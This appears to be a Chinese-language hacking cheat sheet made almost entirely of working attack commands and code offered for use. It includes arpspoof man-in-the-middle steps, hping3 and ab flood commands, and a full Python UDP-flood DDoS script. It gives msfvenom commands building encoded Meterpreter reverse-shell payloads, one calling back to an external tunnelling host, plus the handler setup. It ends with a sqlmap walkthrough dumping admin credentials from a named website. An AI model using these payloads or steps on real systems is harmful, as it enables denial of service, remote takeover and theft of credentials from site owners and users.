arpspoof -i eth0 -t+IPV4+网关
要确认IP转发功能的状态,可以查看/proc文件系统,
使用下面命令: cat /proc/sys/net/ipv4/ip_forward
如果上述文件中的值为0,说明禁止进行IP转发;
如果是1,则说明IP转发功能已经打开。
要想打开IP转发功能,
可以直接修改上述文件: echo 1 > /proc/sys/net/ipv4/ip_forward
把文件的内容由0修改为1。禁用IP转发则把1改为0。
hping3 -S -P -U --flood -V --rand-source +IP
或
cd DDos-Attack
python ddos-attack.py
IP
端口:80
ab -n 10000000 -c 600 + 网站(端口,目录)
ddos-attack.py脚本如下
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
print
print "Author : HA-MRX"
print "You Tube : https://www.you-tube.com/c/HA-MRX"
print "github : https://github.com/Ha3MrX"
print "Facebook : https://www.facebook.com/muhamad.jabar222"
print
ip = raw_input("IP Target : ")
port = input("Port : ")
os.system("clear")
os.system("figlet Attack Starting")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1
外网:(具体教程搜索一下Sunny-Ngrok内网穿透)
./sunny clientid 你的id
64位(外):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=vipgz5.idcfengye.com lport=10016 -f exe -o haya.exe
64位(内):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe
32位:
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe
android:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=1234 R > root/test.apk
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.101
set lport 1234
exploit
第一步:检测注入 sqlmap -u http://tunesoman.com/product.php?id=200
一直回车即可,最后可检测出版本
第二步:检测该IP有哪些数据库 sqlmap -u http://www.tunesoman.com/product.php?id=200 --dbs
此时显示出所有的数据库
第三步:检测出数据库之后,开始获取它里面的表 (batch的意思是不用一直yes,直接运行到底)
这时就检测出来了
第四步:我们来检测一下admin_user表里有哪些字段。(–column列出字段 ,-T后面+表名,-D后面+数据库名)
第五步:这时我们就可以查出这些字段内有什么数据(-C查看字段,–dump是把所有的记录列出来)
sqlmap -u http://www.tunesoman.com/product.php?id=200 -C admin_user_name,admin_user_pass -T admin_user -D db363851433 --batch --dump
此时我们就获取到了所有的数据了,里面包含用户名和密码,这时我们就可以进去它的服务器了
最后:输入用户名和密码,进入服务器。